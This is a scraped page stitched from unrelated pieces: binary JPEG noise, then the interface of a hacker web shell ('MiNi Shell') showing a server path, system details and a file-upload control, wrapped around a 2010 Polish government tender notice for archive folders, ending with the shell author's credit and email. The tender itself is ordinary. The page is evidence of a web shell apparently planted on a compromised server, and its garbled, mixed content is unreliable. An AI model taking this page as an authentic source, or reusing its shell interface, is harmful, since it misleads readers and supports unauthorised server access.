JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100402/93128-N-2010.html

<p class="kh_header"><b>Warszawa: Zakup i dostawa materiałów do archiwizacji dokumentacji (teczki A4) na potrzeby archiwum dla Mazowieckiego Oddziału Regionalnego i 33 Biur Powiatowych Agencji Restrukturyzacji i Modernizacji Rolnictwa.</b><br>
<b>Numer ogłoszenia: 93128 - 2010; data zamieszczenia: 02.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa - Mazowiecki Oddział Regionalny , ul. Jana Pawła II 70, 00-175 Warszawa, woj. mazowieckie, tel. 022 5365705-06, faks 022 8602914.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.arimr.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Agencja płatnicza.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup i dostawa materiałów do archiwizacji dokumentacji (teczki A4) na potrzeby archiwum dla Mazowieckiego Oddziału Regionalnego i 33 Biur Powiatowych Agencji Restrukturyzacji i Modernizacji Rolnictwa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego zamówienia jest zakup i dostawa materiałów do archiwizacji dokumentacji (teczki A4) na potrzeby archiwum dla Mazowieckiego Oddziału Regionalnego i 33 Biur Powiatowych ARiMR.
2.Szczegółowy opis przedmiotu zamówienia:
A.Teczki A4 jednostronnie białe, wiązane, które powinny spełniać następujące wymogi:

a)format A4, 
b)wykonana z jednostronnie białego kartonu o gramaturze 400-450 g/m2,
c)wiązana na tasiemki o długości co najmniej 150 mm, przymocowane w sposób bezklejowy,
d)grzbiet teczki oraz grzbiety zakładek bocznych  bigowane co 5 mm,
e)posiadająca trzy zakładki boczne chroniące dokumenty przed wypadnięciem,    szerokość zakładek bocznych liczona od zagięcia ostatniego bigu powinna wynosić co najmniej 75 mm,
f)zamawiający wymaga dostarczenia teczek w formie złożonej.

- w ilości: 205350 sztuk (słownie: dwieście pięć tysięcy trzysta pięćdziesiąt szt.)

B.Teczki archiwizacyjne A4, szerokość grzbietu 4-5 cm, które powinny spełniać następujące wymogi:
a)format A4,
b)wykonana z kartonu o gramaturze 500-550g/m2,
c)szerokość grzbietu teczki i zakładek bocznych 400 - 500 mm,
d)wiązana na tasiemki o długości co najmniej 150 mm, przymocowane w sposób bezklejowy,
e)grzbiet teczki oraz grzbiety zakładek bocznych bigowane co 5 mm,
f)posiadająca trzy zakładki boczne chroniące dokumenty przed wypadnięciem,    szerokość zakładek bocznych liczona od zagięcia ostatniego bigu powinna wynosić co najmniej 100 mm,
g)zamawiający wymaga dostarczenia teczek w formie złożonej.

- w ilości: 7420 sztuk (słownie: siedem tysięcy czterysta dwadzieścia szt.)

3. Zamawiający wymaga, aby Wykonawca dysponował powierzchnią magazynową umożliwiającą przechowywanie materiałów do archiwizacji dokumentacji, będących przedmiotem zamówienia, o powierzchni min. 35 m2.
4. W celu potwierdzenia, że oferowane materiały do archiwizacji dokumentacji (teczki A4), odpowiadają wymaganiom określonym w rozdz. III pkt 2 SIWZ, Zamawiający żąda dołączenia do oferty próbek oferowanych materiałów do archiwizacji dokumentacji (teczki A4) po jednej sztuce z rodzaju. 
Zamawiający, w trybie art. 97 ust. 2 ustawy Pzp, zwróci w/w próbki Wykonawcom, których oferty nie zostały wybrane, na ich wniosek.
5. Wykonawca dostarczy materiały do archiwizacji dokumentacji (teczki A4), które będą zgodne z wymaganiami Zamawiającego dotyczącymi przedmiotu zamówienia (określonymi w rozdz. III pkt. 2 SIWZ), jednorazowo bądź wielorazowo, w ilościach i do miejsc wskazanych, zgodnie z poniższym zestawieniem (Tabela nr 1, stanowiąca Załącznik nr 2 Do umowy).

Tabela nr 1.
Lp.	Numer Biura Powiatowego	Nazwa powiatu	Teczki A4
(cienki
grzbiet)
Szt.	Teczki o grzbiecie
4-5 cm
Szt.	Adres	Miejsce, do którego będzie dostarczany przedmiot zamówienia
1	118	Białobrzegi	4000	500	ul. Składowa 5, 
26-800 Białobrzegi
(dostawa jednorazowa)	Parter, pok. nr 3
2	119	Ciechanów	10000	0	Ul. Rzeczkowska 11,
06-400 Ciechanów (dostawa jednorazowa)	Parter, pok. nr. 14
3	120	Garwolin	50	100	Ul. Główna 55,Miętne, 08-400 Garwolin (dostawa jednorazowa)	Piwnica
4	122	Grodzisk Maz.	2500	250	ul. Cegielniana 1, 
05-825 Grodzisk Mazowiecki (dostawa jednorazowa)	Magazyn na parterze
5	123	Grójec	13000	800	Nowa Wieś 70 B, 
05-660 Warka 
(dostawa jednorazowa)	Parter
6	124	Kozienice	13000	0	Ul. Warszawska 72,
26-900 Kozienice (dostawa wielorazowa)	I piętro, pok. nr 18
7	125	Legionowo	2000	250	Ul. Sikorskiego 11,
05-120 Legionowo (dostawa jednorazowa)	II piętro, magazyn 
8	126	Lipsko	13000	500	Ul. Iłżecka 1,
27-300 Lipsko (dostawa jednorazowa)	Strych, II piętro
9	127	Łosice	5000	0	ul. Krasickiego 1, 
08-200 Łosice
(dostawa jednorazowa)	Parter, pok. nr 14
10	128	Maków Maz.	300	200	Oś. Bazar 15, 06-200 Maków Mazowiecki (dostawa jednorazowa)	Parter, pok. nr 11
11	129	Mińsk Maz.	7000	0	Ul. Konstytucji 3 Maja 12,05-300 Mińsk Mazowiecki (dostawa jednorazowa)	II piętro, pok. nr 4
12	130	Mława	0	150	Ul. Graniczna 8,
06-500 Mława (dostawa jednorazowa)	Parter
13	131	Nowy Dwór 	1700	0	ul. Ogrodnicza 6, 
05-180 Pomiechówek (dostawa jednorazowa)	Parter - korytarz
14	132	Ostrołęka	15000	0	ul. Korczaka 4, 
07-410 Ostrołęka (dostawa jednorazowa)	Piwnica, pok. nr 2
15	134	Otwock	800	0	Ul. Legionów 2, 
05-400 Otwock
(dostawa jednorazowa)	I piętro, pok. nr 8
16	135	Piaseczno	3000	0	ul. Rybie 8, 
05-530 Góra Kalwaria
(dostawa jednorazowa)	Parter, pok. 3
17	136	Płock	18000	500	ul. Bielska 57A, 
09-400 Płock
 (dostawa jednorazowa)	Magazyn w piwnicy
18	137	Płońsk	8000	500	Ul. Sienkiewicza 11,
09-100 Płońsk (dostawa jednorazowa)	Magazyn w piwnicy
19	138	Pruszków	2000	200	Ul. Pszczelińska 99,
05-840 Brwinów (dostawa jednorazowa)	Parter, pokój nr 3
20	139	Przasnysz	2000	20	ul. Szpitalna 10 A, 
06-300 Przasnysz
(dostawa jednorazowa)	Strych, II piętro, pok. nr 19
21	140	Przysucha	1000	150	ul. Szkolna 7, 
26-400 Przysucha
(dostawa jednorazowa)	I piętro, pok. nr 12
22	141	Pułtusk	3000	0	Golądkowo 41 J, 
06-120 Winnica
(dostawa jednorazowa)	Parter
23	142	Radom	17000	400	Ul. Lubelska 65,
26-600 Radom (dostawa wielorazowa)	Parter
24	144	Sierpc	5000	400	Ul. Kopernika 8,
09-200 Sierpc (dostawa jednorazowa)	Parter
25	145	Sochaczew	2500	800	Ul. Łąkowa 22,
96-500 Sochaczew (dostawa jednorazowa)	Parter, pok. nr 7
26	146	Sokołów P.	5000	0	ul. Oleksiaka Wichury 3, 08-300 Sokołów Podlaski, (dostawa jednorazowa)	III piętro, magazyn
27	147	Szydłowiec	3500	0	ul. Kościuszki 170, 
26-500 Szydłowiec 
(dostawa jednorazowa)	I piętro, pok. nr 11
28	149
	W-wa Zach	2000	300	ul. Trakt Królewski 91, Wojcieszyn 
05-083 Zaborów (dostawa jednorazowa)	I piętro, strych
29	150	Węgrów	13000	400	ul. Podlaska 1, 
07-100 Węgrów 
(dostawa jednorazowa)
	I piętro, pok. nr 8
30	152	Wyszków	6000	0	ul.3Maja 24, 
07-200 Wyszków
(dostawa jednorazowa)	Parter, pok. nr 5
31	153	Zwoleń	13000	0	ul. Targowa 54, 
26-700 Zwoleń
(dostawa wielorazowa)	Parter, pok. nr 18
32	154	Żuromin 	5000	0	ul. 1-go Maja 8 D, 09-310 Kuczbork, Zielona
(dostawa jednorazowa)	Parter - pok. nr 10
33	155	Żyrardów	3000	0	ul. Piaskowa 21/23, 
96-300 Żyrardów
(dostawa jednorazowa)	Parter, pok. nr 8
34	OR07	Mazowiecki OR07	6000	
1000	ul. Dzika 2, 
00-175 Warszawa
(dostawa jednorazowa)	Magazyn na parterze.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 22.85.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje, co najmniej 2 (dwie) dostawy materiałów do archiwizacji dokumentacji (teczki A4) o wartości, co najmniej 100 000 PLN każda (słownie: sto tysięcy złotych 00/100), oraz załączy dokumenty potwierdzające, że te dostawy zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik.
2. W przypadku udzielenia zamówienia wykonawcom wspólnie ubiegającym się o udzielenie zamówienia (art. 23 ustawy Pzp) - zamawiający przed podpisaniem umowy zażąda złożenia umowy regulującej współpracę tych wykonawców.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.arimr.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Restrukturyzacji i Modernizacji Rolnictwa - Mazowiecki Oddział Regionalny 
Al. Jana Pawła II 70, 00-175 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.04.2010 godzina 10:00, miejsce: Agencja Restrukturyzacji i Modernizacji Rolnictwa - Mazowiecki Oddział Regionalny 
Al. Jana Pawła II 70, 00-175 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com